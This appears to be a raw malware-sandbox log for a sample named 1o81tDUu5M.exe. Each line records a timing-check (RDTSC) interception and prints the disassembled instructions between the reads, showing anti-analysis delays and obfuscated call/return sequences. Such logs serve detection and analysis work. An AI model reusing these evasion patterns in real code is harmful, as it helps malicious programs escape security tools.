Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 110CA4C second address: 110CA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 110CA50 second address: 110CA5A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 110BC5B second address: 110BC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 110CA5A second address: 110CA5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 110BC5F second address: 110BC63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 110BC63 second address: 110BD04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FE801498578h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 or edi, 571C8B67h 0x0000002a push dword ptr fs:[00000000h] 0x00000031 mov edi, dword ptr [ebp+122D28F3h] 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e sub dword ptr [ebp+122D3B21h], eax 0x00000044 mov eax, dword ptr [ebp+122D0C01h] 0x0000004a push 00000000h 0x0000004c push eax 0x0000004d call 00007FE801498578h 0x00000052 pop eax 0x00000053 mov dword ptr [esp+04h], eax 0x00000057 add dword ptr [esp+04h], 00000014h 0x0000005f inc eax 0x00000060 push eax 0x00000061 ret 0x00000062 pop eax 0x00000063 ret 0x00000064 call 00007FE801498581h 0x00000069 mov ebx, 3AC021A4h 0x0000006e pop edi 0x0000006f sbb edi, 05C561C3h 0x00000075 push FFFFFFFFh 0x00000077 cld 0x00000078 nop 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007FE801498582h 0x00000080 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 110CBDF second address: 110CBF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE80147AC00h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 110CBF7 second address: 110CC9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80149857Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FE801498578h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 add dword ptr [ebp+122D1A9Ah], ecx 0x0000002d push dword ptr fs:[00000000h] 0x00000034 jg 00007FE80149857Ch 0x0000003a add ebx, 2AAB7E82h 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 sub dword ptr [ebp+122D2462h], eax 0x0000004d mov eax, dword ptr [ebp+122D0629h] 0x00000053 jmp 00007FE80149857Eh 0x00000058 sub di, 2199h 0x0000005d push FFFFFFFFh 0x0000005f push 00000000h 0x00000061 push ebx 0x00000062 call 00007FE801498578h 0x00000067 pop ebx 0x00000068 mov dword ptr [esp+04h], ebx 0x0000006c add dword ptr [esp+04h], 00000014h 0x00000074 inc ebx 0x00000075 push ebx 0x00000076 ret 0x00000077 pop ebx 0x00000078 ret 0x00000079 mov ebx, dword ptr [ebp+122D2138h] 0x0000007f push eax 0x00000080 push eax 0x00000081 push edx 0x00000082 jns 00007FE801498578h 0x00000088 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 110FD19 second address: 110FD7E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE80147ABF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FE80147ABF8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D1F79h], ecx 0x0000002d push 00000000h 0x0000002f or edi, 0105C231h 0x00000035 push 00000000h 0x00000037 mov ebx, edx 0x00000039 xchg eax, esi 0x0000003a jo 00007FE80147AC0Ah 0x00000040 jmp 00007FE80147AC04h 0x00000045 push eax 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1111BF2 second address: 1111BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 110FFB6 second address: 110FFBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1112E79 second address: 1112E7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1115DB1 second address: 1115DB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1116DEB second address: 1116DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1116DEF second address: 1116DFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1116DFD second address: 1116E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1116E01 second address: 1116E07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1116E07 second address: 1116E0C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1115F36 second address: 1115F4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE80147ABFAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1113FCF second address: 1113FF5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE801498576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007FE801498581h 0x00000010 jmp 00007FE80149857Bh 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1116051 second address: 1116057 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1116057 second address: 111605C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1116F40 second address: 1116FC6 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE80147ABF8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D1BEDh], ecx 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov dword ptr [ebp+12453F3Dh], ebx 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007FE80147ABF8h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 sbb ebx, 0AC4B6BDh 0x00000049 mov eax, dword ptr [ebp+122D0C69h] 0x0000004f push 00000000h 0x00000051 push edi 0x00000052 call 00007FE80147ABF8h 0x00000057 pop edi 0x00000058 mov dword ptr [esp+04h], edi 0x0000005c add dword ptr [esp+04h], 00000016h 0x00000064 inc edi 0x00000065 push edi 0x00000066 ret 0x00000067 pop edi 0x00000068 ret 0x00000069 push FFFFFFFFh 0x0000006b mov di, dx 0x0000006e nop 0x0000006f pushad 0x00000070 jl 00007FE80147ABFCh 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1117D4A second address: 1117DEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498584h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FE801498578h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+12454650h] 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007FE801498578h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 0000001Ch 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 push 00000000h 0x00000048 call 00007FE80149857Dh 0x0000004d add edi, dword ptr [ebp+122D399Bh] 0x00000053 pop edi 0x00000054 mov dword ptr [ebp+122D39BAh], edx 0x0000005a push eax 0x0000005b pushad 0x0000005c pushad 0x0000005d jmp 00007FE801498583h 0x00000062 pushad 0x00000063 popad 0x00000064 popad 0x00000065 pushad 0x00000066 jg 00007FE801498576h 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 111AEB4 second address: 111AEB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1119FCD second address: 1119FD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FE801498576h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 111AEB8 second address: 111AED6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE80147AC04h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 111AED6 second address: 111AF61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007FE801498576h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f or di, 14F2h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FE801498578h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 mov edi, dword ptr [ebp+122D2012h] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007FE801498578h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 0000001Ah 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 jmp 00007FE801498586h 0x00000057 xchg eax, esi 0x00000058 je 00007FE801498580h 0x0000005e pushad 0x0000005f pushad 0x00000060 popad 0x00000061 jc 00007FE801498576h 0x00000067 popad 0x00000068 push eax 0x00000069 push ebx 0x0000006a push eax 0x0000006b push edx 0x0000006c pushad 0x0000006d popad 0x0000006e rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 111B198 second address: 111B19C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1121BD8 second address: 1121BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1121BDC second address: 1121BFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147ABFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FE80147AC02h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1121BFD second address: 1121C18 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE801498583h 0x00000008 jmp 00007FE80149857Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1121C18 second address: 1121C43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE80147AC05h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007FE80147ABFCh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10C2243 second address: 10C224C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112555F second address: 1125569 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FE80147ABF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10C8C8C second address: 10C8C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1124B77 second address: 1124B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1124B82 second address: 1124B8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1124B8C second address: 1124B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1124B91 second address: 1124B97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1124CC7 second address: 1124CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE80147AC00h 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007FE80147AC02h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1124CF3 second address: 1124D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE80149857Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1124ECE second address: 1124EF9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE80147AC09h 0x00000008 jmp 00007FE80147AC03h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE80147ABFEh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1124EF9 second address: 1124F11 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE801498576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e jnl 00007FE801498576h 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A159 second address: 112A174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE80147AC06h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A174 second address: 112A17B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A17B second address: 112A1B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jo 00007FE80147AC0Dh 0x0000000e jmp 00007FE80147AC07h 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 ja 00007FE80147ABFCh 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 popad 0x00000023 mov eax, dword ptr [eax] 0x00000025 push edx 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A1B6 second address: 112A1C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A1C8 second address: 112A1CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A1CC second address: 112A1D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A2EB second address: 112A307 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE80147ABFDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A307 second address: 112A30B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A30B second address: 112A311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A311 second address: 112A326 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE801498580h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A326 second address: 112A33D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jc 00007FE80147AC04h 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007FE80147ABF6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A33D second address: 112A35C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE801498583h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A3F0 second address: 112A3F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A3F4 second address: 112A439 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE801498580h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e jo 00007FE801498582h 0x00000014 jnl 00007FE80149857Ch 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FE801498584h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1130570 second address: 1130578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1130B2B second address: 1130B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE801498585h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1130B44 second address: 1130B5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11310E7 second address: 1131128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE801498588h 0x0000000d jo 00007FE801498591h 0x00000013 jmp 00007FE80149857Dh 0x00000018 jmp 00007FE80149857Eh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1131128 second address: 113112F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 113126E second address: 1131272 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1131272 second address: 11312A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE80147ABFEh 0x0000000b push esi 0x0000000c jl 00007FE80147ABF6h 0x00000012 jo 00007FE80147ABF6h 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FE80147ABFFh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1131681 second address: 1131697 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE801498576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007FE801498576h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1136EEB second address: 1136EEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1135BF7 second address: 1135BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1135BFD second address: 1135C03 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1135C03 second address: 1135C24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FE801498576h 0x0000000a jmp 00007FE801498587h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1135D9D second address: 1135DC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147ABFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FE80147AC0Bh 0x0000000f jmp 00007FE80147ABFFh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1135F04 second address: 1135F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1135F0A second address: 1135F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE80147ABFCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1135F21 second address: 1135F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
